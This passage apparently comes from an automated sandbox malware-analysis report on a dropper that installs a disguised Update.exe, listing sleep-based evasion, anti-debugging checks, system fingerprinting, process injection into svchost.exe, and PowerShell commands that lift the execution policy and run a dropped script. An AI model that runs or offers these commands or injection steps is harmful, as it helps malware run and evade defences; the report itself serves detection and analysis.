                      Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5368Thread sleep time: -58690s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 5900Thread sleep count: 269 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 348Thread sleep count: 3806 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2368Thread sleep count: 647 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 8185 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep count: 1414 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 4504Thread sleep count: 268 > 30
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 2568Thread sleep count: 263 > 30
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 6584Thread sleep count: 141 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeLast function: Thread delayed
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeThread sleep count: Count: 5869 delay: -10Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAAF888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6CAAF888
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAAF7D7 FindFirstFileExW,3_2_6CAAF7D7
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_037F80F0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F5430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_037F5430
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeThread delayed: delay time: 73000Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .0 $tVmNetworkAdPSDscXMachine.psm1l
                      Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PEventVmNetwoPSDesiredStateConfiguration.types.ps1xml
                      Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: Update.exe, 00000003.00000003.2840513111.0000000000895000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509713615.0000000000896000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeAPI call chain: ExitProcess graph end nodegraph_3-70288
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_006E15D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_006E15D0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0380054D VirtualProtect ?,-00000001,00000104,?3_2_0380054D
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C70AE4 mov eax, dword ptr fs:[00000030h]3_2_00C70AE4
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_036700CD mov eax, dword ptr fs:[00000030h]3_2_036700CD
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F6790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,3_2_037F6790
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_006E1764 SetUnhandledExceptionFilter,3_2_006E1764
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_006E15D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_006E15D0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_006E1A8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_006E1A8F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FDF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_037FDF10
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FF00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_037FF00A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03801F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_03801F67
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA9C85A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CA9C85A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAA3AAF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CAA3AAF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA9C4ED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CA9C4ED
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10006815
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10008587
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C767EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C767EC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F77E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_037F77E0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F77E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_037F77E0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe3_2_037F77E0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe3_2_037F77E0
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: Update.exe, 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
                      Source: Update.exe, 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drBinary or memory string: .lnkutility::usystem::resolveShortcutFromFileresolveShortcutFromFile buffer is too smallShell_TrayWndnot traywndutility::usystem::getSystBarHeightit is pcutility::usystem::isNoteBookPCit is notebookutility::usystem::isNoteBookPCShcore.dllGetDpiForMonitorldenvAccept: */*
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_037F5430
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6CAACEBE
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6CAB68D3
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6CAB682C
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6CAAC9C3
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6CAB69D9
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6CAB645A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6CAB66AD
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6CAB67E1
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6CAB670C
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6CAB616E
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6CAB63BF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
